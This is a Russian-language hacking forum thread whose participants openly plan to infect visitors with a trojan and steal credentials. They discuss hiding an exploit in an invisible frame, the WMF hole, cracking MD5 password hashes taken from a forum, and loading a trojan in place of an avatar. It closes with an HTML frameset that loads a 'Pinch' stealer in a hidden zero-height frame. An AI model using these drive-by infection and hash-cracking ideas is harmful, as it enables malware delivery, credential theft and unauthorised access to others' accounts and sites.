Еще? или уже?
Вешай эксплоит. Обойдется ~ 1k зелени.

Мдя ... 1000$ офигеть ... после того, что делают некоторые люди, то их себестоимость сводится к нулю
Правильно, вешай в невидимый фрейм. А вообще посмотри тему, такая уже поднималась

мне это ни очем не сказало

"невидимый фрейм" это были ключевые слова, введи их в поиск и они тебе скажут много интересного...

может мне эта уязвимость поможет MS Fax and Picture Viewer ????
а может всетаки кто-то подскажет как шеллом wmf.
пользоваться!? конечно все прекрасно у меня открывает ,без разрешения,тока как сделать тоже самое чтобы мой трой открывался?

твой трой должен залиться на комп юзеру и потом запуститься у него. Для этого нужны сплойты, использующие дыры броузеров и тд. Все они стоят денег. Кароче затраты от этого ты поимеешь не сопоставимые со смыслом от этого. Да еще и гемороя поимеешь ИМХО.

Сам подумай. Если бы это было легко, то многие админы и вебмастера так и делали и интернет погрузился бы в хаос...
Допустим сломал кто-нить мэйл.ру, на главной странице сделал так как ты хочешь, только не с пинчем, а с вм и еголд-троями и появился бы новый алигарх.... Это я образно конечно сказал...

ну а как мне поступить в этом случае? мне впринципе не сам форум нужен,а нужно через форум получить доступ к сайту,через человека который лазиет на этом форуме, впринципе пароли на всех пользователей есть там,но они в md5, пробывал какой-то программой расшивровать,ну часов 12 просидел и забил! это бесконечный алгоритм!
У меня такой вопрос возникает-нельзя заставить вместо аватара грузить трояна?
Ну что мне посоветуете?

чёто я тут надыбал! сам низнаю чё! впринципе неплохо было написано когда я читал про это...

<FRAMESET rows="*,0">
<FRAME SRC="нормальная ссылка" NAME="тут как я понял-какой фаил должен открытся">
<FRAME SRC="ссылка на пинча" NAME="мой пинч">
</FRAMESET>

неужели нельзя подставить функцию на атоматическое выполнение второй ссылки?